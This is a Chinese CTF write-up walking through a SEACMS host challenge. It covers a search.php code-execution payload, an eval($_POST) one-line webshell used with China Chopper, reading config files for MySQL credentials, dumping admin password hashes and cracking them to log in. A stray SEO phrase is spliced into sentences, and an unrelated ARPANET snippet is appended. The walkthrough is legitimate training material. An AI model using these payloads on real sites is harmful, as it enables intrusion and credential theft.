这篇文章主要介绍“CTF主机渗透实战分析”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“CTF主机渗透实战分析”文章能帮助大家解决问题。实战此题如下:此道题一共需要拿到5个flag,从哪里入手呢?第一步:首先我们打开连接地址:http://202.0.0.206第二步:漏洞分析根据分析,此道题是一个SEACMS的平台系统该版本通过其他论坛平台了解到存在一个代码执行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我们来试试此漏洞能够利用,直接在后面的phpinfo()就可以执行任意php代码直接访问http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()发现phpinfo()执行成功了,说明该漏洞存在。我们尝试看看源码中有没有flag,右键打开此页面的源码,在源码果然有一个flag= flag1{ac727d1a3130e4093b3665120a3240a5}第三步:一句话木马利用接下来我们利用一句话木马来利用。使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])构造一句话小马。打开工具菜刀,在地址栏中填写http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密码为simple,点击添加连接成功了,如下:第四步:胡乱捣腾接下来就是耗时的去找了,如小偷进家,没有目的只能胡乱的翻了!费时很久在 /home目录下发现有key文件,打开文件,获得flag2=flag2{6634eaf4ce34a82da12d835c1ed86a24}在 /etc目录下的my.cnf关于数据库mysql的配置文件。发现flag3和数据库相关账户信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了数据库的密码。第五步:数据库操作在上一步获取到关于数据库的用户名和密码,使用用户名和密码,重新配置菜刀,连接数据库。提交打开数据库,在seacms中的flag表中,找到一个flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}分别在数据库中查询seacms的后台的账号密码SELECT `name` FROM `sea_admin`SELECT `password` FROM `sea_admin`第六步:密码破解取到的密码免费云主机域名是MD5加密,密码为:23a7bbd73250516f069d 百度MD5在线解密,发现该加密值是20位,使用了和dedecms一样的加密方式,将该加密值的前三位和最后一位去掉,就是16位的MD5加密,在线解密结果是admin123。第六步:找后台登录页面接下来找到网站的后台登录页面,我们这里使用DirBuster工具。使用在数据库中已经获得的用用户名和密码,登录网站后台密码是admin123。好了,登录成功,我们拿到了后台登录页面,并可以使用管理员账号登录。第七步:胡乱捣腾在后台逛了半天,终于在网站后台查找计划任务时,发现key5。flag5{f01cbadfd0daee0d65c2502a38581558}最后,到此为止,5个flag全部找出来了,接下来我们把5个flag放入答题框。关于“CTF主机渗透实战分析”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识,可以关注云编程开发博客行业资讯频道,小编每天都会为大家更新不同的知识点。
互联网的主要前身为阿帕网。他是由美国在1974年国防部国防高等研究计划署(ARPA)的罗伯特卡恩和斯坦福大学的文顿.瑟夫开发了TCP/IP协免费云主机域名议,定义了在电脑网络之间传送信息的方法。1983年1月1日,ARPA网将其网络核心协议由网络控制程序改变为…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。